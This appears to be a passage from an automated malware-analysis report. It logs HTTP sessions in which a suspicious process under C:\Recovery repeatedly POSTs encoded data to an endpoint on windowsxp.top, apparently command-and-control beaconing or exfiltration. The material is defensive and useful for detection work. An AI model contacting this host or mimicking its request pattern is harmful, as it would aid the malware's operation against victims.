                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1215&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1234441&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:19.385067940 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  41 | 192.168.2.4 | 49890 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:19.509474039 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:19.868072987 CET | 1012 | OUT | Data Raw: 55 5a 58 5e 5e 52 53 52 54 58 57 54 54 50 5b 5d 59 58 5b 51 52 57 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZX^^RSRTXWTTP[]YX[QRWR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%>Y"9Y"6;.(X388P/?)?7!'/-7X=<:Z-/!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:20.104995966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:20.414608955 CET | 770 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:20 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcFkkJzBsFA0pRER3s66qAmwcm99SQ8BX5oBgF%2Fs%2FLZO8jvkqRwVBp0Ejnh4ZNIqTnCFFhn2PrQO3GxaBzZSAJaE3j2q1dt0VxM4U6MijacLw4KbAtuBZ9wJeZOyhKM0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b77649b46c1c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1294012&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  42 | 192.168.2.4 | 49896 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:20.608278990 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1692
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:20.963224888 CET | 1692 | OUT | Data Raw: 55 5a 5d 5f 5e 58 53 55 54 58 57 54 54 54 5b 5e 59 5a 5b 5f 52 54 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]_^XSUTXWTTT[^YZ[_RTRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&4Z!1"6(Z-B30;(--$S*/,P"!3Z->(=/!:!Y##X('
                                                                                                                  Oct 27, 2024 19:23:21.232511044 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:21.539321899 CET | 920 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NMkReiks7ojsUiWstoQgZYugYaZ3CUBkrY%2FfUsKdDRuckxnPc6lN%2BTsgdHKyTsJbfL12Gp8wohcduulhixpl7Lncw7nFaFI2IDUidRi%2BVhGXhuQ7acAS2kqAEA3HSfTd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b77d5ccd0bb8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1606&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2013&delivery_rate=924058&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5d 22 3e 3c 11 28 3f 29 1e 2a 31 21 1d 25 2c 39 10 2e 32 06 11 3d 03 2a 0e 39 38 3a 51 24 34 07 43 3f 07 0a 11 23 00 02 53 2b 25 21 5e 00 1c 27 5c 22 00 39 14 26 3b 27 03 27 1e 24 5e 35 13 28 07 2a 58 2d 51 2b 07 05 06 3f 2b 30 0c 2c 11 31 55 26 17 22 5a 2d 2b 2e 5a 28 10 2a 54 0c 14 21 58 2d 59 23 02 22 21 1b 1e 2a 22 16 5b 27 2d 2b 0b 30 14 0e 10 2b 12 34 05 3c 2d 39 10 21 02 0a 5c 3f 38 36 5a 27 3d 2b 59 2a 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"]"><(?)*1!%,9.2=*98:Q$4C?#S+%!^'\"9&;''$^5(*X-Q+?+0,1U&"Z-+.Z(*T!X-Y#"!*"['-+0+4<-9!\?86Z'=+Y*."T")S0YP0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  43 | 192.168.2.4 | 49897 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:20.659945011 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:21.009491920 CET | 1012 | OUT | Data Raw: 55 53 58 54 5e 5c 56 55 54 58 57 54 54 53 5b 5a 59 50 5b 59 52 5f 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USXT^\VUTXWTTS[ZYP[YR_R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\1,X"95]"6\-4$^$^ W/.4T)#413/-(=9-!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:21.240716934 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:21.472637892 CET | 778 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X43NltoWchlpjdK9SXEWb%2BR8XU%2Br6Pw0fJLou5Not1oVmgV8LFeDp6k0f5LZypAX4g%2FRqiOznef%2Blu0xlNnvtAKgadEAaT5b5sFDR8bU%2FhjbAdi%2FgbOJkXLgo8tinAtK"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b77d6b0c0c17-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1062362&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  44 | 192.168.2.4 | 49903 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:21.607111931 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:21.962794065 CET | 1012 | OUT | Data Raw: 50 55 5d 58 5b 5f 56 5e 54 58 57 54 54 57 5b 58 59 5e 5b 5e 52 51 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PU]X[_V^TXWTTW[XY^[^RQRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&35:%#5$[9$,]$838U*/(#1/,=_./!Y##X(+
                                                                                                                  Oct 27, 2024 19:23:22.226033926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:22.528465986 CET | 768 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZ7wL3W1Ap0YGiCx9l02t4abhAFRK5EujuFR0eU8bsDabg3oK%2FMvhBd2F92BvmwLSw7KUXeItW9Dtc0eTsm4T4GyP7jFuycdpezV2eZER4eJ9VKTM4s0xQmAF8Av5sfS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7837edf6b28-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1115&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1306859&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  45 | 192.168.2.4 | 49909 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:22.656532049 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:23.023518085 CET | 1012 | OUT | Data Raw: 50 57 5d 58 5e 5c 56 56 54 58 57 54 54 56 5b 5f 59 58 5b 5a 52 51 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PW]X^\VVTXWTTV[_YX[ZRQRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%# 9%!<Z.$407->8*"",=7_)).?!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:23.260824919 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:23.475785971 CET | 774 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ne4RxCFWfNIdFkpUCsX4Y4K%2BsWESg%2F%2BNKeikjWNFGerK3rN14jOUWRHHtgo3pXVba5xStOLVE3zdo89ZT1AZtUSi9V71dxZ3%2FgmmpXdgmd0hgPYYCfKFbqWsPJFIvIpv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b789fecfe96a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1061&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1328440&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  46 | 192.168.2.4 | 49915 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:23.620448112 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:23.977475882 CET | 1012 | OUT | Data Raw: 55 5a 5d 5f 5b 5f 53 55 54 58 57 54 54 50 5b 5d 59 5d 5b 5a 52 5e 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZ]_[_SUTXWTTP[]Y][ZR^RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']%X _"*1589$(^$8-= ><7#"Z--;^?,9?!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:24.221551895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:24.533438921 CET | 767 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MM4YTCk%2BkqgiuETLKrTRJ6iv2OSkcMqRXqHxqLeTqzvhDr0zPonmskIHxinGxcIE2VD2lIILjWS%2FwoheRmK55Tr0mLxn0yH9WAvN%2F4v2sK%2BndWpYBAnHWwXbQMUNW2bW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b78fea6ae7cb-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2100&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=708414&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:24.533529997 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  47 | 192.168.2.4 | 49921 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:24.674752951 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:25.024260998 CET | 1012 | OUT | Data Raw: 55 57 5d 5f 5b 5b 56 50 54 58 57 54 54 5c 5b 52 59 5a 5b 59 52 5e 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UW]_[[VPTXWTT\[RYZ[YR^R\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2/65X#%<]-'?0+;;;(<+4T3Y8.+*_-!Y##X(
                                                                                                                  Oct 27, 2024 19:23:25.284326077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:25.595818996 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJir1ZB8i573%2FMqw38ijkY3V4dVTqElYjKUw1hX82kdUMWgMByksxfnm%2B1tpel%2FpGYL07dV%2FX0ARWyJGnjzHC2696I3drj%2F9UIvUhrnpVNId1VnmUYxzl7qQXrPl6jDo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b796a96f4864-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=872289&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  48 | 192.168.2.4 | 49931 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:25.736021996 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:26.086759090 CET | 1012 | OUT | Data Raw: 55 57 58 54 5e 59 56 5e 54 58 57 54 54 51 5b 5e 59 59 5b 58 52 51 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWXT^YV^TXWTTQ[^YY[XRQRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&./"!(_-438(V;W>$V"!$;[<)%-/!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:26.350963116 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:26.677417994 CET | 768 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TRL8XDdKJXH52r2aH%2FHKczgh4hooTSVxuheJqlOE9c7qfouKQV27G7RID0PkQ4891K2w9MFJOIkbYAZaYZjIzbKBd16a7IayWQLmzFdusp4oveFuMORfD5xG7qsCLnZJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b79d4c706b79-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1195706&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  49 | 192.168.2.4 | 49936 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:26.551053047 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:26.982070923 CET | 1716 | OUT | Data Raw: 50 52 58 54 5b 5c 56 53 54 58 57 54 54 53 5b 53 59 51 5b 51 52 55 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRXT[\VSTXWTTS[SYQ[QRUR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1X 6:#&8\.?$/=$>?4V71?;$>/>9?!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:27.147943020 CET | 25 | IN | HTTP/1.1 100 Continue
